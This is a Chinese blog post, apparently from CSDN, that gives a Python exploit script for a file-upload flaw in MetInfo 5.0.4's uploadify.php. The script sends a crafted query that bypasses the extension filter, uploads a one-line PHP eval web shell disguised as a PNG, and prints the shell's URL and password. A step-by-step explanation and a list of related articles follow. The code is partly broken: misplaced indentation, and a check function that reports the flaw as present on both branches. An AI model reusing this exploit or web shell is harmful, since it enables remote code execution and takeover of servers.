简单文件上传EXP

最新推荐文章于 2024-04-26 11:59:34 发布
最新推荐文章于 2024-04-26 11:59:34 发布
阅读量94 收藏
点赞数
文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77915293/article/details/131943688
版权 
import requests

url = "http://192.168.177.167/MetInfo5.0.4"

headers = {
 "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.42"
}

def checkvul(url):
   path = "/admin/include/uploadify.php"
   if requests.get(url=url+path, headers=headers).status_code == 200:
     print("[INFO] vul is exists!")
     return True
   else:
      print("[INFO] vul is exists!")
      return False

def attack(url):
     paylaod = "/admin/include/uploadify.php"
     paylaod += "?metinfo_admin_id=a"
     paylaod += "&metinfo_admin_pass=admin"
     paylaod += "&met_admin_table=met_admin_table%23"
     paylaod += "&type=upfile"
     paylaod += "&met_file_format=jpg|pphphp"

files = {
      "Filedata": ("sh.php", "<?php @eval($_REQUEST[777]);phpinfo();?>", "image/png")
 }

res = requests.post(url=url+paylaod, headers=headers, files=files)

shell_url = f"{url}/{res.text[5:]}"
print(f"shell_url is {shell_url}")

if requests.get(shell_url).status_code == 200:
     print(f"[RESULT]\n Shell: {shell_url}\n password is: 777")

if checkvul(url):
     attack(url=url)

代码详解:

这段代码是一个简单的漏洞利用脚本。下面我会逐步解释每个部分的功能和作用。

首先,通过import requests导入了一个名为requests的库,用于发送HTTP请求。

然后,定义了一个变量url,用于存储目标网站的URL,这里是"http://192.168.177.167/MetInfo5.0.4",即目标站点。

接下来,定义了一个名为headers的字典,存储了HTTP请求的头部信息。这个头部信息中包含了用户代理(User-Agent)字符串,用于伪装成浏览器进行请求。这里使用了Chrome浏览器的User-Agent字符串。

接下来是checkvul函数的定义,该函数用于检测漏洞是否存在。函数的参数是一个URL。

checkvul函数中,定义了一个变量path,存储了漏洞检测的路径"/admin/include/uploadify.php"。

接下来,通过发送一个GET请求到目标URL+路径,并带上前面定义的头部信息。然后检查响应的状态码是否为200。如果是200,表示漏洞存在,打印"[INFO] vul is exists!“,并返回True;否则,打印”[INFO] vul is not exists!",并返回False。

接下来是attack函数的定义,该函数用于攻击目标站点。函数的参数也是一个URL。

attack函数中,定义了一个变量payload,存储了攻击所使用的负载。这个负载是一系列参数的拼接,用于构造攻击请求的URL。

然后,定义了一个名为files的字典,存储了一个文件上传的参数。这个文件上传的参数包括文件的元数据和内容。

接下来,通过发送一个POST请求到目标URL+负载路径,并带上前面定义的头部信息和文件参数。然后将响应的内容赋值给变量res

然后使用切片操作,从res的第5个字符开始截取字符串,构造出一个shell_url

接下来打印出shell_url,用于显示攻击成功后的shell的URL。

然后,通过发送一个GET请求到shell_url,并检查响应的状态码是否为200。如果是200,表示攻击成功,打印 “[RESULT]\n Shell: {shell_url}\n password is: 777”。

最后,通过调用checkvul函数,检测漏洞是否存在,如果漏洞存在,则调用attack函数进行攻击。

LUZHISHENGSHELL
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
文件操作安全之-文件上传原理篇
村中少年的专栏
09-19 1948
文件上传漏洞的原理,文件上传漏洞的具体案例,例如CVE-2011-2202 PHP文件上传漏洞以及CVE-2020-17518 Apache flink文件上传漏洞,文件上传漏洞潜在的危害阐述文件上传中的安全问题。
oracle数据库怎么导出dat文件_Oracle 数据库导出(exp)导入(imp)说明
weixin_39905226的博客
12-22 714
Oracle 数据库导出(exp)导入(imp)说明更新时间:2009年02月27日 21:57:54 作者:exp将数据库内的各对象以二进制方式下载成dmp文件,方便数据迁移。buffer:下载数据缓冲区,以字节为单位,缺省依赖操作系统consistent:下载期间所涉及的数据保持read only,缺省为ndirect:使用直通方式 ,缺省为nfeeback:显示处理记录条数,缺省为0,即...
使用python编写简单文件上传exp
CC210231的博客
04-02 2090
最近开始学习使用python进行exp的编写,毕竟python的功底也不太好,期间遇到了许多问题,下面,就记录一下编写文件上传exp的过程,希望对需要的人有帮助! 首先,我使用的是pikachu靶场的的文件上传的第一个模块来练习 创建一个简单地一句话木马,将文件后缀改为jpg(由于这一关是前端白名单验证,我们能通过抓包修改文件后缀绕过;也可以直接用exp绕过,因为requests的请求不经过前端,也就是不进行客户端验证,直接在请求数据中用php后缀就行;但这里我们要分析数据包,得进行正常的上传流
sftp上传文件服务器,使用SFTP上传文件到服务器的简单使用
weixin_35070925的博客
08-04 2616
最近用到SFTP上传文件查找了一些资料后自己做了一点总结,方便以后的查询/*** 将文件上传到服务器** @param filePath* 文件路径* @param channelSftp* channelSftp对象* @return*/public static boolean uploadFile(String filePath, ChannelS...
asp.net ftp上传文件到服务器,.net 文件上传到服务器上
weixin_32445717的博客
07-30 751
详解 Linux 下 SSH 远程文件传输命令 scp3、将本地文件上传到服务器上 scp-P 2222/home/lnmp0.4.tar.gz root@www.vpser.net:/root/lnmp0.4.tar.gz 复制代码 上端口大写P 为参数,2222 表示更改SSH端口后的端口,如果没有更改SSH端口可以不用添加该参数。...文章知与谁同2017-05-021444浏览量你以为的A...
linux内核exp,简单的linux提权收集的N多linux内核exp
weixin_30140317的博客
05-08 219
这是简单的linux提权收集的N多linux内核exp下载,创建一个表, Linux低权限提权 反弹试试 tmp里创建好文件,就可以利用这个函数执行命令,准备提权.先看下linux内核 uname -a 2.6.18-194.11.3.el5 内核 2010的,我们是要来做其他的事情。软件介绍简单的linux提权收集的N多linux内核exp是按照上面的方法,可能报错会显示出来,估计修改过了 试着...
蓝凌-EIS-api-任意文件上传_exp-漏洞复现
weixin_43167326的博客
01-20 533
蓝凌EIS是一款全面的企业管理软件,以知识管理为核心,致力于提升组织产能。其特点在于高度自定义、易用性和灵活扩展性。通过自定义功能和流程,蓝凌EIS能够满足企业的个性化需求。同时,简单的界面和操作方式使得员工能够快速上手使用。蓝凌EIS还注重知识管理,提供知识模板和知识库等功能,方便员工进行知识分享和学习。此外,蓝凌EIS还提供丰富的。
文件上传漏洞(三)
guanjian_ci的博客
02-19 3395
第一部分:文件上传基本概述 文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。常见场景是web服务器允许用户上传图片或者普通文本文件保存,而用户绕过上传机制上传恶意代码并执行从而控制服务器。显然这种漏洞是getshell最快最直接的方法之一,需要说明的是上传文件操作本身是没有问题的,问题在于文件上传到服务器后,服务器怎么处理和解释文件。 第二部分:文件上传基本操作 1.修改文件名后缀 正常图片文件后缀一般为jpg png gif等 首先上传一个图片码,然
POC&EXP编写—POC编写实战
最新发布
剁椒鱼头没剁椒的博客
04-26 1311
整体来说POC编写是没那么复杂的,主要需要你先复现一遍漏洞流程,在复现过程中提取响应页面中唯一性内容用作比较,然后根据不同的异常结果做好相应的处理机制。同时由于关于POST请求的POC多数都属于EXP了,那么关于EXP的编写我们下章再介绍,其实EXP和POC基本上写的方式是一样的,只是EXP可能会涉及到一些较为复杂的机制,例如文件上传,通过GET请求就可以测试是否存在文件上传,但是上传文件的时候,可能就需要POST请求了,同时脚本返回的信息,dnslog返回的信息等等。并且,后续如何将POC与EXP
使用nodejs+express实现简单文件上传功能
12-23
3.在routes/index.js中引用multer,由于还要使用到文件操作,还要引用fs模块,并指定文件上传目录 const multer = require('multer'); const fs = require('fs'); const UPLOAD_PATH = './uploads' 单文件上传: ...
Nodejs进阶:基于express+multer的文件上传实例
01-20
概览 图片上传是web开发中经常用到的功能,node社区在这方面也有了相对完善的支持。...非常简单,一行命令。 npm install express multer multer --save 每个示例下面,都有下面两个文件 ➜ upload-custom-filename
exp_Amstell-SL - MetaTrader 5EA.zip
09-11
"exp_Amstell-SL - MetaTrader 5 EA.zip" 是一个包含MetaTrader 5智能交易系统的压缩文件,其核心文件是"exp_Amstell-SL.mq5"。 1. **智能交易系统(Expert Advisor,EA)**: 智能交易系统是MetaTrader 5平台的一...
Exp_XROC2_VG_Tm - MetaTrader 5EA.zip
09-11
首先,需要将压缩包中的所有文件上传到MT5的相应文件夹:专家顾问(Experts)、指标(Indicators)和包含文件(Include)。然后,在图表上右键点击,选择"插入"->"专家顾问",找到并添加"Exp_XROC2_VG_Tm"。在专家...
保存波前 .OBJ 文件(简单或彩色):将三角网格对象保存为波前 .obj 文件,可选择使用用户定义的面或顶点颜色。-matlab开发
05-31
obj 文件中的示例生成的 .obj 和 .mtl 文件已作为示例上传到 poly.google.com: poly.google.com/view/5N0rs0RgEQV poly.google.com/view/60c2exp4Riu 函数 obj_write* 进行特定于 unix 的系统调用以使用 grep。 这...
AspcnUP v1.6(上传组件)
11-12
AspcnUP v1.6 是一个专门用于ASP(Active Server Pages)开发环境的上传组件,它使得在Web应用中实现文件上传功能变得更加简单和高效。ASP是微软的一种服务器端脚本语言,常用于构建动态网页。上传组件在现代网站...
基于python web开发的简易订单系统+源代码+文档说明
12-01
##基于python开发的简易订单系统 、 ### 1. 框架简述 该系统前端采用了RestAPI的设计,使用jQuery异步调取后端WEB接口的形式获取json的数据并渲染展示。 后端框架采用了base(基础类库层)、bean(后台逻辑层)、...
NodeJS 编写了些常用的后端项目接口, 小白学习需要使用
11-10
在前端,Axios常被用于与后端API进行交互,如发送登录、注册的POST请求,获取用户信息的GET请求,以及上传更换头像的文件请求。 H5(HTML5)是现代网页开发的标准,提供了丰富的功能和API,增强了网页的互动性和...
exp导出dmp文件
07-28
您可以使用 Oracle 数据库的 EXP 工具来导出 dmp 文件。以下是导出 dmp 文件的基本步骤: 1. 打开命令行终端或命令提示符。 2. 输入以下命令来访问 Oracle 数据库的 EXP 工具: ``` exp username/password@...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值